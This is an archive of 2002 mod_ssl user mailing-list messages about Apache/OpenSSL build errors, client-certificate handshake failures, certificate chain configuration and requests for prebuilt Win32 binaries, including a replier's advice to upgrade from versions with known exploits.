[Mon Sep 16 22:02:05 2002] [notice] Parent: Received shutdown signal --
Shutting down the server.
[Mon Sep 16 22:02:05 2002] [notice] Child 4400: Exit event signaled. Child
process is ending.
[Mon Sep 16 22:02:06 2002] [notice] Child 4400: Released the start mutex
[Mon Sep 16 22:02:11 2002] [notice] Child 4400: Waiting for 450 worker
threads to exit.
[Mon Sep 16 22:02:11 2002] [notice] Child 4400: All worker threads have
exited.
[Mon Sep 16 22:02:11 2002] [notice] Child 4400: Child process is exiting
[Mon Sep 16 22:02:12 2002] [notice] Parent: Child process exited
successfully.
-=Ivelin=-

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 12:18:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA25087; Tue, 17 Sep 2002 12:17:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA25004; Tue, 17 Sep 2002 12:16:30 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4CD784CE638; Tue, 17 Sep 2002 12:16:30 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CED4D286B3; Tue, 17 Sep 2002 12:15:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web13207.mail.yahoo.com id LAA23709; Tue, 17 Sep 2002 11:24:37 +0200 (MET DST)
Message-ID: <20020917092435.13360.qmail@web13207.mail.yahoo.com>
Received: from [202.144.91.253] by web13207.mail.yahoo.com via HTTP; Tue, 17 Sep 2002 02:24:35 PDT
Date: Tue, 17 Sep 2002 02:24:35 -0700 (PDT)
From: hiren mehta 
Subject: Apache 1.3.9 make fails with mod_ssl 2.4.10 and openssl 0.9.5a
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hiren mehta 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

                      I am getting the error as below
when making apache .I am using Apache 1.3.9+mod_ssl
2.4.10 with openssl 0.9.5 .I also tried with openssl
0.9.5a without success .

                               Error below appears
when making apache
                              
                     
---------------------------------------------------------------
                               ssl_util_ssl.c:145:
conflicting types for
                      `d2i_PrivateKey_bio'
                              
                     
/usrhome/ryoussef/openssl-0.9.5a/include/openssl/x509.h:696:
                      previous declaration of
`d2i_PrivateKey_bio'
                               *** Error code 1
                               make: Fatal error:
Command failed for target
                      `ssl_util_ssl.lo'
                               Current working
directory
                     
/usrhome/ryoussef/apache_1.3.9/src/modules/ssl
                               *** Error code 1
                               make: Fatal error:
Command failed for target
                      `all'
                               Current working
directory
                     
/usrhome/ryoussef/apache_1.3.9/src/modules
                               *** Error code 1
                               make: Fatal error:
Command failed for target
                      `subdirs'
                               Current working
directory
                     
/usrhome/ryoussef/apache_1.3.9/src
                               *** Error code 1
                               make: Fatal error:
Command failed for target
                      `build-std'
                               Current working
directory
                      /usrhome/ryoussef/apache_1.3.9
                               *** Error code 1
                               make: Fatal error:
Command failed for target
                      `build'
                               

Any help how to resolve this is appreciated.

                      Thanks in advance.

                      Regards,
                      Hiren



__________________________________________________
Do you Yahoo!?
Yahoo! News - Today's headlines
http://news.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 12:25:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA25291; Tue, 17 Sep 2002 12:24:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id MAA25279; Tue, 17 Sep 2002 12:23:34 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id E9D07BD2E; Tue, 17 Sep 2002 12:23:37 +0200 (CEST)
Date: Tue, 17 Sep 2002 12:23:37 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.9 make fails with mod_ssl 2.4.10 and openssl 0.9.5a
Message-ID: <20020917102337.GA32441@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <20020917092435.13360.qmail@web13207.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020917092435.13360.qmail@web13207.mail.yahoo.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Sep 17, 2002 at 02:24:35AM -0700, hiren mehta wrote:
> Hi,
> 
>                       I am getting the error as below
> when making apache .I am using Apache 1.3.9+mod_ssl
> 2.4.10 with openssl 0.9.5 .I also tried with openssl
> 0.9.5a without success .
> 
IIRC you would need an even older version of openssl for this to work -
something in the early 0.9.4 series. But you should not do that, as there
are well known exploits for all of these. You really should be using
openssl-0.9.6g, apache-1.3.26 and mod_ssl-2.8.10.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 16:00:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA03728; Tue, 17 Sep 2002 15:59:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id PAA03711; Tue, 17 Sep 2002 15:58:09 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g8HDvsa03379
	for ; Tue, 17 Sep 2002 15:57:58 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Tue Sep 17 15:57:51 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 17 Sep 2002 15:57:51 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 17 Sep 2002 15:57:51 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.87]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 17 Sep 2002 15:57:51 +0200
content-class: urn:content-classes:message
Subject: apache and client certificates
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Tue, 17 Sep 2002 15:57:51 +0200
Message-ID: 
Thread-Topic: apache and client certificates
Thread-Index: AcJeUjZsjK6/f2ztR3m3cYdrvvLvlA==
From: "Jose Correia (J)" 
To: "Modssl-Users (E-mail)" 
X-OriginalArrivalTime: 17 Sep 2002 13:57:51.0295 (UTC) FILETIME=[36689CF0:01C25E52]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA03725
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all

Is anyone aware of Apache version 1.3.20 having problems with client
authentication??

I've created my own CA created using openssl (vs 0.9.6a). I then
created and signed my server certificate with the CA using openssl.
(apache is on a RH Linux 6.2 machine)

I then created a client public key using Java's keytool (from my
Win2000 client machine). I then took this key and signed it with my CA
using openssl which I duly converted into DER format. I then imported
my CA's certificate in my JSSE keystore plus the now created client
certificate which replaces the previous public key.

In my Apache I mention these (I have mod-ssl vs 2.8.4):
SSLCertificateFile /jose/CA2/server.crt
SSLCertificateKeyFile /jose/CA2/server.key
SSLCACertificateFile /jose/CA2/demoCA/cacert.pem
SSLVerifyClient require
SSLVerifyDepth  10

When I connect, I'm getting the following on ssl_engine.log

"[17/Sep/2002 15:20:22 28388] [error] SSL handshake failed (server
155.239.48.43:443, client 165.148.59.202) (OpenSSL library error
follows)
[17/Sep/2002 15:20:22 28388] [error] OpenSSL: error:14094416:SSL
routines:SSL3_READ_BYTES:sslv3 alert certificate unknown"

and from my Java client I'm getting:

"main, SEND SSL v3.1 ALERT:  fatal, description = certificate_unknown
main, WRITE:  SSL v3.1 Alert, length = 2
javax.net.ssl.SSLPeerUnverifiedException: peer not authenticated"

Hence my confusion since I know my client certificate was signed by
the CA mentioned in apache httpd.conf... :-(

Anyone got a clue? I've searched extensevily...

Thanks a lot
Jose Correia
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 17:02:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07014; Tue, 17 Sep 2002 17:01:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id RAA06998; Tue, 17 Sep 2002 17:00:57 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Tue, 17 Sep 2002 11:00:50 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: Intermediate Certificates
Date: Tue, 17 Sep 2002 11:00:40 -0400
Importance: high
X-Priority: 1
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C25E5A.FCC965C0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C25E5A.FCC965C0
Content-Type: text/plain;
	charset="iso-8859-1"


Hi,

Can you put more than one intermediate signer certificate for chaining in
Apache?
Meaning having two lines in the apache config file.

SSLCertificateChainFile /usr/local/apache/conf/ssl.crt/ca.crt
SSLCertificateChainFile /usr/local/apache/conf/ssl.crt/ca1.crt

or 1 line pointing to the file but have both intermediate certs together..

such as 

-----Begin Certificate-----
code
-----Begin Certificate-----
-----Begin Certificate-----
code
-----Begin Certificate-----


SSLCertificateChainFile /usr/local/apache/conf/ssl.crt/ca.crt (containing
both)


Thanks,
Rob

------_=_NextPart_001_01C25E5A.FCC965C0
Content-Type: text/html;
	charset="iso-8859-1"






Intermediate Certificates






Hi,




Can you put more than one intermediate signer certificate for chaining in Apache?

Meaning having two lines in the apache config file.




SSLCertificateChainFile /usr/local/apache/conf/ssl.crt/ca.crt

SSLCertificateChainFile /usr/local/apache/conf/ssl.crt/ca1.crt




or 1 line pointing to the file but have both intermediate certs together..




such as 




-----Begin Certificate-----

code

-----Begin Certificate-----

-----Begin Certificate-----

code

-----Begin Certificate-----






SSLCertificateChainFile /usr/local/apache/conf/ssl.crt/ca.crt (containing both)






Thanks,

Rob





------_=_NextPart_001_01C25E5A.FCC965C0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 19:57:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA11773; Tue, 17 Sep 2002 19:56:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from th06.opsion.fr id TAA11767; Tue, 17 Sep 2002 19:55:46 +0200 (MET DST)
Received: from 212.180.95.194 [212.180.95.194] by th06.opsion.fr id 200209171755.2119; Tue, 17 Sep 2002 17:55:33 GMT
Message-ID: <3D876D0D.9060303@ifrance.com>
Date: Tue, 17 Sep 2002 19:57:33 +0200
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020809
X-Accept-Language: fr-fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: SSL error
References: 
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I am running apache 2.0.40 + SSL + mod_proxy
I have many error when i benchmark my server with stress tools 
(silkperformer):

[Tue Sep 17 19:36:03 2002] [error] SSL Library Error: 336151568 
error:14094410:lib(20):func(148):reason(1040)
[Tue Sep 17 19:36:03 2002] [error] SSL error on reading data

If someone have an idea,

best regards,

Estrade Matthieu


________________________________________________________________
Etudiant: Wanadoo t'offre le Pack eXtense Haut Débit soit 150,92 euros d'économies !
Et pour 1 euro de plus, reçois le CD-ROM du jeu Dark Age of Camelot
+ 1 mois de jeu en réseau offert ! 
Clique ici : http://www.ifrance.com/_reloc/mail.etudiant 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 17 23:30:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA17671; Tue, 17 Sep 2002 23:29:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from picard.skynet.be id XAA17666; Tue, 17 Sep 2002 23:28:40 +0200 (MET DST)
Received: from Anakin (43.66-136-217.adsl.skynet.be [217.136.66.43])
	by picard.skynet.be (8.11.6/8.11.6/Skynet-OUT-2.20) with SMTP id g8HLSNk28752
	for ; Tue, 17 Sep 2002 23:28:23 +0200 (MET DST)
	(envelope-from )
From: "Thierry Cabuzel" 
To: 
Subject: RE: Apache + VirtualHost + WebDAV + mod_ssl
Date: Tue, 17 Sep 2002 23:33:39 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <000b01c254d5$fc0b2030$1100000a@woburn.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Thierry Cabuzel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I have tried it well enough to encounter a big problem with it :-(
SSL work well, but there is not all the PHP extensions I could except.
Especially PHP_IMAP, PHP_GD with GIF support, and PHP_XSLT for the more
important for me :-(( And PHP does some check on the interface version, then
I can't take them from another more complete PHP build :-((

I think I will take this probem to the level 2: Format my 2nd computer,
install Linux and do it all 'a la mano' with a C compiler...


> -----Message d'origine-----
> De : owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]De la part de Martin Dickau
> Envoyé : jeudi 5 septembre 2002 14:16
> À : modssl-users@modssl.org
> Objet : Re: Apache + VirtualHost + WebDAV + mod_ssl
>
>
> You should try OpenSA (http://www.opensa.org).  V1.0.3 is
> available, and it
> has Apache 1.3.26 + mod_ssl 2.8.10 + OpenSSL 0.9.6g, built for
> Windows, with
> a Windows installer.  The release notes/download page is here:
> http://www.opensa.org/download/100.html
>
> ----- Original Message -----
> From: "Thierry Cabuzel" 
> To: 
> Sent: Thursday, September 05, 2002 2:45 AM
> Subject: RE: Apache + VirtualHost + WebDAV + mod_ssl
>
>
> > I have no probem to update apache. but for mod_ssl, I have
> bigger problem
> as
> > the contrib page of modssl.org seems out of order and the ftp
> folder is a
> > bit messy and OpenSSL_0.9.6c seems to be the older I can find in it.
> Source
> > is not a good solution as I have no C compiler and I don't want to mess
> with
> > one (at a point that I prefer to take the risk of a backdoored mod_ssl
> found
> > via google on an unknow server than to have to compile it from source).
>
> The OpenSA 1.0.3 kit also includes mod_ColdFusion (4.5.x), mod_DAV 1.0.3,
> PHP 4.2.2, mod_ASP, mod_GZIP, and mod_AuthMysql 2.22.
>
> Regards,
>
> Martin Dickau, ByAllAccounts
> mdickau@byallaccounts.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 01:09:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA20064; Wed, 18 Sep 2002 01:07:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from utimaco.be id BAA20054; Wed, 18 Sep 2002 01:06:52 +0200 (MET DST)
From: jonathan.cloots@utimaco.be
Received: (from smtp@localhost)
	by utimaco.be (8.11.1/8.11.1) id g8HNBTY04336
	for ; Tue, 17 Sep 2002 23:11:29 GMT
	(envelope-from jonathan.cloots@utimaco.be)
X-Authentication-Warning: Internet-Router.utimaco.be: smtp set sender to  using -f
Received: from belgien1(10.7.0.25), claiming to be "belgien1.utimaco.be"
 via SMTP by Internet-Router, id smtpdkQ4330; Tue Sep 17 23:11:22 2002
Subject: Jonathan Cloots/Utimaco/BE is out of the office.
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 18 Sep 2002 01:00:57 +0200
X-MIMETrack: Serialize by Router on Belgien1/Utimaco/BE(Release 5.0.7 |March 21, 2001) at
 09/18/2002 01:00:58 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jonathan.cloots@utimaco.be
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I will be out of the office starting  16/09/2002 and will not return until
01/01/3000.

I will be out of the office starting  04/09/2002 and will not return until
31/12/3000.

Please call our general number +32/(0)16/44.01.35 or our general e-mail
address: info.dts@utimaco.be

Kind regards,
       Jonathan

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 05:32:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA26018; Wed, 18 Sep 2002 05:31:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id FAA26008; Wed, 18 Sep 2002 05:30:14 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 17 Sep 2002 20:29:08 -0700
Received: from 172.147.24.44 by lw7fd.law7.hotmail.msn.com with HTTP;
	Wed, 18 Sep 2002 03:29:08 GMT
X-Originating-IP: [172.147.24.44]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Wed, 18 Sep 2002 03:29:08 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Sep 2002 03:29:08.0446 (UTC) FILETIME=[8C4067E0:01C25EC3]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have been unable to find the file:

Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

at the following location:

http://www.modssl.org/contrib/ftp/contrib/

Any help from our fellow members in the group would be higly appreciated in 
view of the recent openSSL worm virus alerts.

Thanks and Regards,

Bye,
-Jim.


>From: Paul  To: jimlee2@hotmail.com
>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>Date: Wed, 18 Sep 2002 09:02:41 +1200
>
> > Hi,
> >
> > I am looking for the following file:
> >
> >
> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> >
> >
> > in the     http://www.modssl.org/contrib/ftp/contrib/       folder.
> >
> >
> > If anyone could contribute this file, i would highly appreciate it.
> >
>
>Hi Jim,
>
>I'm looking for that file too!  Did you have any luck.
>
>Cheers, Paul.
>--




_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 06:49:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA27399; Wed, 18 Sep 2002 06:48:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id GAA27395; Wed, 18 Sep 2002 06:47:54 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 17 Sep 2002 21:47:48 -0700
Received: from 172.147.24.44 by lw7fd.law7.hotmail.msn.com with HTTP;
	Wed, 18 Sep 2002 04:47:47 GMT
X-Originating-IP: [172.147.24.44]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
Date: Wed, 18 Sep 2002 04:47:47 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Sep 2002 04:47:48.0038 (UTC) FILETIME=[8958FE60:01C25ECE]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Since i am a windows user, i am looking for an already compiled file:
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip

Since i do not have any compilers installed, i would really appreciate if 
any of our UNIX friends could help our WINDOWS collegues and post the 
Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip file in the following 
location: http://www.modssl.org/contrib/ftp/contrib/

Thanks,

Bye,
-Jim.

>From: Horst To: Jim Lee 
>Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>Date: Tue, 17 Sep 2002 20:42:08 -0700 (PDT)
>
>Hi Jim,
>I didn't read all the previous messages and the reference to
>http://www.modssl.org/contrib/ftp/contrib/
>  but I'd guess you can google for the 3 independent files.
>That's how I found Apache_1.3.26 and Mod_SSL_2.8.10 recently.
>
>  - Horst (ohh, just realizing you are on Win - I am on linux and got the
>RPMs with no problem)
>
>
>On Wed, 18 Sep 2002, Jim Lee wrote:
>
> > I have been unable to find the file:
> >
> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> >
> > at the following location:
> >
> > http://www.modssl.org/contrib/ftp/contrib/
> >
> > Any help from our fellow members in the group would be higly appreciated 
>in
> > view of the recent openSSL worm virus alerts.
> >
> > Thanks and Regards,
> >
> > Bye,
> > -Jim.
> >
> >
> > >From: Paul
To: jimlee2@hotmail.com
> > >Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> > >Date: Wed, 18 Sep 2002 09:02:41 +1200
> > >
> > > > Hi,
> > > >
> > > > I am looking for the following file:
> > > >
> > > >
> > > > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> > > >
> > > >
> > > > in the     http://www.modssl.org/contrib/ftp/contrib/       folder.
> > > >
> > > >
> > > > If anyone could contribute this file, i would highly appreciate it.
> > > >
> > >
> > >Hi Jim,
> > >
> > >I'm looking for that file too!  Did you have any luck.
> > >
> > >Cheers, Paul.
> > >--
> >
> >
> >
> >
> > _________________________________________________________________





_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 18 11:53:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA06111; Wed, 18 Sep 2002 11:52:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts6-srv.bellnexxia.net id LAA06106; Wed, 18 Sep 2002 11:51:53 +0200 (MET DST)
Received: from sympatico.ca ([64.231.123.18]) by tomts6-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020918095151.UATQ12912.tomts6-srv.bellnexxia.net@sympatico.ca>
          for ; Wed, 18 Sep 2002 05:51:51 -0400
Message-ID: <3D884CBC.6090208@sympatico.ca>
Date: Wed, 18 Sep 2002 05:51:56 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jim Lee wrote:
> Hi,
> 
> Since i am a windows user, i am looking for an already compiled file:
> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
> 
> Since i do not have any compilers installed, i would really appreciate 
> if any of our UNIX friends could help our WINDOWS collegues and post the 
> Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip file in the 
> following location: http://www.modssl.org/contrib/ftp/contrib/
> 
> Thanks,
> 
> Bye,
> -Jim.
> 
>> From: Horst To: Jim Lee 
>> Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>> Date: Tue, 17 Sep 2002 20:42:08 -0700 (PDT)
>>
>> Hi Jim,
>> I didn't read all the previous messages and the reference to
>> http://www.modssl.org/contrib/ftp/contrib/
>>  but I'd guess you can google for the 3 independent files.
>> That's how I found Apache_1.3.26 and Mod_SSL_2.8.10 recently.
>>
>>  - Horst (ohh, just realizing you are on Win - I am on linux and got the
>> RPMs with no problem)
>>
>>
>> On Wed, 18 Sep 2002, Jim Lee wrote:
>>
>> > I have been unable to find the file:
>> >
>> > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>> >
>> > at the following location:
>> >
>> > http://www.modssl.org/contrib/ftp/contrib/
>> >
>> > Any help from our fellow members in the group would be higly 
>> appreciated in
>> > view of the recent openSSL worm virus alerts.
>> >
>> > Thanks and Regards,
>> >
>> > Bye,
>> > -Jim.
>> >
>> >
>> > >From: Paul
> 
> To: jimlee2@hotmail.com
> 
>> > >Subject: Re: Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>> > >Date: Wed, 18 Sep 2002 09:02:41 +1200
>> > >
>> > > > Hi,
>> > > >
>> > > > I am looking for the following file:
>> > > >
>> > > >
>> > > > Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
>> > > >
>> > > >
>> > > > in the     http://www.modssl.org/contrib/ftp/contrib/       folder.
>> > > >
>> > > >
>> > > > If anyone could contribute this file, i would highly appreciate it.
>> > > >
>> > >
>> > >Hi Jim,
>> > >
>> > >I'm looking for that file too!  Did you have any luck.
>> > >
>> > >Cheers, Paul.
>> > >--
>> >
>> >
>> >
>> >
>> > _________________________________________________________________
> 
> 
> 
> 
> 
> 
> _________________________________________________________________
> MSN Photos is the easiest way to share and print your photos: 
> http://photos.msn.com/support/worldwide.aspx
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
Jim and/or Paul,

I don't know how to contribute... I will find out, but it is late and I 
want to go to bed.  Maybe someone can put these into 
http://www.modssl.org/contrib/ftp/contrib/ for me.  And, someone could 
shorten the path to the knowledge of how to submit the code for 
contribution -- I tried ftp'ing and could not write (no suprise).

I have binaries (untested) for the releases you are after.
(I am running Apache 2.0.40 but can easily build the code for these 
versions - configuring and testing it is more work and I leave that up 
to you).

If you have any problem with the code I will spend some more time on it 
later in the evening - send me a note (theantigod@sympatico.ca or 
hunter@tor.ath.cx).

http://tor.ath.cx/~hunter/apache/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6g-Win32.zip
